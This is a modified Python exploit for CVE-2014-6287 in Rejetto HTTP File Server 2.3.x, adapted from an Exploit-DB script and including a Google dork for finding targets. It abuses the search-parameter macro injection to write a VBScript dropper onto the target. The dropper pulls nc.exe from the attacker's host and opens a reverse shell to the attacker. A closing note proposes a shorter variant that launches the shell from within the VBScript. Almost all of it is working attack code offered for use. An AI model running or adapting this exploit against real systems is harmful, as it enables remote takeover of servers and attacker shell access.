Modified version of the CVE-2014-6287 (Rejetto HTTP File Server 2.3.x remote command execution) Python exploit found here: https://www.exploit-db.com/exploits/39161/
#!/usr/bin/env python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more
# compatible with today's Internet. It also differs from classic web servers because
# it's very easy to use and runs "right out-of-the box". Access your remote files, over
# the network. It has been successfully tested with Wine under Linux.
# Usage : python Exploit.py <Target IP address> <Target Port Number>
# EDB Note: You need to be running a web server on the local IP that serves netcat at
# http://<attackers_ip>:80/bin/nc.exe, and a listener on the local port, before launching.
# You may need to run it multiple times for success!
import urllib2 as url | |
import sys | |
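# Listener the target connects back to when the optional 3rd/4th CLI
# arguments are omitted, so the original two-argument usage keeps working.
DEFAULT_LHOST = "10.11.0.95"  # local IP address
DEFAULT_LPORT = "443"  # Local Port number

# Drop locations on the target, percent-encoded because they are spliced
# straight into the ?search= query string.
VBS_PATH = "C%3A%5CUsers%5CPublic%5Cscript.vbs"
NC_PATH = "C%3A%5CUsers%5CPublic%5Cnc.exe"

# Upper bound (seconds) on waiting for the final exec request; see main().
NC_REQUEST_TIMEOUT = 10


def _build_vbs_dropper(lhost):
    """Return the percent-encoded VBScript that pulls nc.exe from ``lhost``.

    Decoded, the script is::

        dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
        dim bStrm: Set bStrm = createobject("Adodb.Stream")
        xHttp.Open "GET", "http://<lhost>/bin/nc.exe", False
        xHttp.Send
        with bStrm
            .type = 1 '//binary
            .open
            .write xHttp.responseBody
            .savetofile "C:\\Users\\Public\\nc.exe", 2 '//overwrite
        end with

    That is a plain-HTTP download from port 80 of ``lhost`` with no TLS and
    no integrity check, so the web server hosting /bin/nc.exe must already
    be up when the dropper runs.
    """
    return (
        "dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)"
        "%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)"
        "%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F" + lhost +
        "%2Fbin%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm"
        "%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20."
        "open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20."
        "savetofile%20%22" + NC_PATH + "%22%2C%20"
        "2%20%27%2F%2Foverwrite%0D%0Aend%20with"
    )


def _send_macro(rhost, rport, macro, timeout=None):
    """Fire one HFS macro through the CVE-2014-6287 search injection.

    The leading %00 is the trigger: it is what makes vulnerable HFS 2.3x
    builds evaluate the {. ... .} macro that follows instead of searching
    for it. The response body is not inspected -- HFS gives no reliable
    success indicator here, which is why the header says several runs may
    be needed. Raises IOError (urllib2.URLError is a subclass) on
    connection failure or, when ``timeout`` is set, on timeout.
    """
    target = "http://" + rhost + ":" + rport + "/?search=%00{.+" + macro + ".}"
    if timeout is None:
        response = url.urlopen(target)
    else:
        response = url.urlopen(target, timeout=timeout)
    response.close()


def main():
    """Stage the VBScript dropper, run it, then launch the reverse shell.

    Usage::

        python Exploit.py <Target IP> <Target Port> [<Local IP> <Local Port>]

    The local IP/port default to DEFAULT_LHOST/DEFAULT_LPORT, so the original
    two-argument form still works. Exits with status -1 on bad arguments or
    when either staging request fails. The third request (nc.exe -e cmd.exe)
    is bounded by NC_REQUEST_TIMEOUT because HFS may not answer while the
    spawned process is alive; a timeout there is reported, not treated as
    failure -- check the listener instead.
    """
    args = sys.argv
    if len(args) not in (3, 5):
        print("[-] Usage is: python %s <Target IP address> <Target Port Number> "
              "[<Local IP address> <Local Port Number>]" % args[0])
        print("[-] Or change DEFAULT_LHOST / DEFAULT_LPORT in the script.")
        sys.exit(-1)
    rhost, rport = args[1], args[2]
    lhost = args[3] if len(args) == 5 else DEFAULT_LHOST
    lport = args[4] if len(args) == 5 else DEFAULT_LPORT

    # {.save|<path>|<content>.} writes the dropper; {.exec|<cmd>.} runs commands.
    save = "save|" + VBS_PATH + "|" + _build_vbs_dropper(lhost)
    exe1 = "exec|cscript.exe%20" + VBS_PATH
    exe2 = "exec|" + NC_PATH + "%20-e%20cmd.exe%20" + lhost + "%20" + lport

    try:
        _send_macro(rhost, rport, save)
        _send_macro(rhost, rport, exe1)
    except IOError as err:
        # Narrow handler: the original bare `except:` also swallowed
        # KeyboardInterrupt/SystemExit and hid the actual error.
        print("[-] Something went wrong..! (%s)" % err)
        sys.exit(-1)

    print("[*] Dropper staged; a listener should be waiting on %s:%s" % (lhost, lport))
    try:
        _send_macro(rhost, rport, exe2, timeout=NC_REQUEST_TIMEOUT)
    except IOError as err:
        print("[*] No reply to the nc.exe exec request (%s); check the listener" % err)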
# Run the exploit only when this file is executed directly, not on import.
if __name__ == "__main__":
    main()
Thoughts on collapsing this into two requests (one `save` and one `exec`) by folding the nc.exe launch into the VBScript itself via WScript.Shell, which makes the separate nc_run() request unnecessary, and updating execute_script accordingly:
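# Single-request dropper: the VBScript fetches nc64.exe from ip_addr, saves it
# as C:\Users\Public\nc.exe and launches the reverse shell itself through
# WScript.Shell, so the separate nc_run() request is no longer needed.
# The script path is percent-encoded like the nc.exe path and like the
# original `save` macro: a bare "C:\Users\..." literal would send raw ':' and
# '\' in the query string and is also a SyntaxError on Python 3, where "\U"
# starts a unicode escape.
# NOTE(review): ip_addr and local_port are not defined in the gist above; they
# correspond to lhost/lport in main().
vbs = (
    "C%3A%5CUsers%5CPublic%5Cscript.vbs|"
    "dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)"
    "%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)"
    "%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F" + ip_addr +
    "%2Fnc64.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm"
    "%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open"
    "%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile"
    "%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite"
    "%0D%0Aend%20with%0D%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)"
    "%0D%0AobjShell.Exec(%22C%3A%5CUsers%5CPublic%5Cnc.exe%20-d%20" + ip_addr +
    "%20" + local_port + "%20-e%20cmd.exe%22)"
)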